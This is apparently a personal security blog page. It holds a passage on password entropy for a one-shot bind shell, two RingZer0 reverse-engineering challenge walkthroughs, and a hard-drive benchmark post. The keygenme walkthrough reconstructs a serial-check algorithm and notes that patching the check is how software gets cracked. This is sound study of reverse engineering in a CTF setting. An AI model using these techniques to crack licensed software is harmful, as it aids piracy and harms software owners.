So in fact, the amount of permutations for 4 bytes of numerical data is only 10 * 10 * 10 * 10 = 10,000. An attacker only needs 10,000 tries to enumerate every single possible combination of 4 digits.

For some reason, society still considers these 4 digit numerical PINs as "reasonably" secure, even when they're not single shot. In some cases PINs in an application (such as a bank website) can be vulnerable to guessing attacks, which means they can eventually and easily be cracked.

Now let me cite an example of a one-shot password, used by Google's two-factor authentication. When you log onto your GMail account, you have the option to have it send a 6-digit pin number to your cell phone, helping to ensure it's actually you logging onto the account.  Well, six digits is 10 * 10 * 10 * 10 * 10 * 10 = 1,000,000.  That's a one in a million shot, which Google has deemed reasonably secure.

Back to our bind shell. Our password is not limited to only numerical characters.

Consider the password Z~r0. This contains 26 possibilities of lower case, 26 possibilities of uppercase, 10 possibilities of digits, and at least 10 possibilities for symbols using a standard keyboard. Seventy-two possibilities per byte. So now our entropy is 72 * 72 * 72 * 72 = 26,873,856.

Someone trying to get into our one-shot shell would need to be pretty lucky, with odds of one in nearly twenty seven million. A considerable leap over the 10,000 we use for PINs and the 1,000,000 Google uses.

We can even go a step further. We don't need to contain our password set to human-readable ones, we can use ASCII bytes that do not have a visible character.  Any combination of bytes, including null bytes would work if we do a direct comparison of 32 bits. So, we open ourselves up to 256 * 256 * 256 * 256 = 4,294,967,296 possibilities. That's four billion with a B.

It's said winning the Powerball lottery is about 1 in 175 million odds (175,223,510). Any attacker would likely be better off trying to figure out a way to crack that than our single-shot bind port.

Thursday, November 27, 2014

RingZer0 Crack Me 1 Walkthrough


This crackme is the 2nd file under the Binaries (Windows/Linux) challenges at It is of course a reverse engineering challenge.

I hope this guide will show some useful techniques to solve this challenge using only simple static analysis without the need to look at the assembly code.

Run the File

We run the file and see the following message box:

When we click OK the dialog closes and the program exits. Obviously there is more to the picture.

Viewing the Resources

During static analysis of the file, we realize it has a binary resource embedded inside of it. The hex begins with 4D 5A, which is the MZ header for PE files. 

As it turns out the program will drop this binary as a DLL tucked hidden away in an AppData folder. We'll simply dump it to disk using Resource Hacker, saving it as crackme1.dll

Inspecting the DLL

We open the DLL using PEView, or alternatively (and often better) PEStudio. We go to the Export Address Table (EAT) and see it exports a function called DisplayMessage.

Run the Exported Function

So in order to run the function, we just have to issue the following command, which uses the rundll32.exe program included with Windows:

RingZer0 Authenticator Walkthrough


This keygenme is the 11th file under the Binaries (Windows/Linux) challenges at A keygenme is a challenge where you need to reverse engineer a serial checksum algorithm. At the time of writing only one other person has solved this particular challenge.

Launching the Program 

I start by launching the program and seeing what it does, keeping an eye out for strings and certain API calls I will want to investigate once I start debugging.

I know right away two places I can start looking. The first is the location where the “Wrong Authentication code” string is loaded into memory. Backtracing from there, I should be able to find the reasons why the input I gave has failed. The next obvious place would be any calls to Win32 APIs which retrieve text from a textbox. There are at least 3 methods: each of them symbol exports from user32.dll.


Opening it in a Debugger

I start the program in Immunity Debugger. Going straight after the string would be easy, and luckily finding the Win32 API calls is as well.

Go to View -> Executable Modules, and a list of all loaded DLLs is shown. Right click on C:\WINDOWS\SYSTEM32\USER32.DLL and click View Names. Scroll down to GetWindowTextA, right click and select View Call Tree. I chose the first one, right clicked and selected Follow Command in Disassembler.

We are taken right where we want to be:

From here we see that after the textbox values are grabbed, there is a call instruction to the function at 0x004014A0. If the result of the function is equal to 0 (false), the JE instruction jumps us to the “Wrong Authentication code” fail state. So we know we must get the condition where the call to 0x004014A0 returns true.

 If we were only interested in bypassing the authentication, we could easily replace the JE instruction with two NOPs (0x90) by editing the hex of the .exe. This is how pirated software is commonly nulled or cracked. Unfortunately, we have to enter a valid key on the RingZer0Team website to get the flag, so we will have to delve a bit deeper and reverse the key check algorithm.

The “Validate” Function 

When we take a brief look at the function in question, we realize it has the structure of a traditional type of validation function.

    if (!test_condition1) return false;
    if (!test_condition2) return false;
    return true;

The first test is pretty easy:

The pre-defined ASCII string loaded into a register and the REPE CMPS assembly instruction is a give-away if you know what the instruction does. It is a mnemonic for “Repeat while Equal, CoMPare Strings”. The JNZ instruction will be true if the strings are not equal, and is a goto to a fail state (return 0) of the function. Here is the equivalent C code for the above assembly:

    if (strcmp(username, "RingZer0") != 0)
        return false;

The next test is also another commonly seen pattern when dealing with strings:

 This snippet uses the REPNE SCAS instruction. This mnemonic means “Repeat while Not Equal, SCAn String”. It is defined to loop over the string until a character equals the value in the eax register, incrementing ecx for each iteration. Here is a C equivalent:

    if (strlen(password) != 16)
        return false;

 Intel’s x86 assembly is full of shortcuts like this, where a single instruction can perform the work of many instructions, as long as the right data is placed in the right registers. This one was still a little hard to follow though, and is either the result of obfuscation techniques or an optimization by the compiler.

Next we come to a more interesting test: 

This, like the previous snippet, has a bit of obfuscation to it. However it simply iterates over the characters and makes sure the first 16 (0x0 to 0xF) are between than ASCII hex codes 0x30 and 0x39, or the numbers 0 through 9.

    for (int i = 0; i < 16; ++i)
        if (password[i] > 0x39 || password[i] < 0x30)
            return false;

The “Checksum” Functions 

Next we come to a section of the code where two functions are called:

I investigated both of these functions in IDA Pro and after some time pouring through them deduced the following prototypes:

 char* username_checksum(const char* username);
 char* authcode_checksum(const char* password);

 The username_checksum() function returns 16 characters, while the authcode_checksum() one only returns 5. After these functions are called, some of the values between the results are compared. More information on that in a second though.

I put a breakpoint on the return value of the username_checksum() function, then tested to see if changing the password had any effect on it (which would be possible if a global variable was modified somewhere else in the code). It did not change, and since I already knew the username had to equal to “RingZer0” from the first validation test, I decided not to focus any more attention on this function.

I set about reversing the authcode_checksum() function.

 I was able to reconstruct the following C code:

    static char buf[6] = { '\0' };

    for (int i = 0; i < 5; ++i)
        buf[i] =     (96 - key[i * 3 + 1]) +
                    (-70 * (key[i * 3] - 48)) +
                    (13 * (key[i * 3 + 2] - 48));

    return buf;

Now we can look at how the two checksums are compared, which is the last test of the “validate” function.

The equivalent C code paints a more obvious picture:

    if (    auth_check[0] == user_check[1] &&
            auth_check[1] == user_check[5] &&
            auth_check[2] == user_check[8] &&
            auth_check[3] == user_check[14]   )
                return true;

This is the return true we need to pass the “validate” function. I looked at the memory to find that the characters being compared in the user_check string were 0x98, 0x97, 0x78, 0x0f, and 0x15. This meant I needed to find an input for authcode_checksum() where it would return a string with those bytes in it.

Inversing the Checksum Algorithm

I opened up Qt Creator, in my opinion the best free C++ IDE, and wrote an inverse function for authcode_checksum(). It takes in the key values compared from the username checksum in order to generate the appropriate crack. This is a simple brute force since entropy was not very high.

When I ran the inverse checksum program, I got the following output:

Which I entered on the RingZer0Team website:

Thanks to @ekse0x for creating this fun challenge.

Wednesday, September 3, 2014

Seagate Backup Plus vs. Western Digital My Passport Benchmarks

I was recently shopping around for a couple of external hard drives. I ultimately came down to a decision between the Seagate Backup Plus and Western Digital My Passport. I ended up buying both so I could compare them for future reference.

The Seagate has faster reads, and the Western Digital has faster writes. Overall performance is hands-down the Western Digital drive, but be warned it is a heavy brick compared to the style of the Seagate. The following benchmarks were performed on Ubuntu Linux 15.04 with the gnome-disks utility, straight out of the boxes.

WD My Passport Benchmark

Seagate Backup Plus Slim Benchmark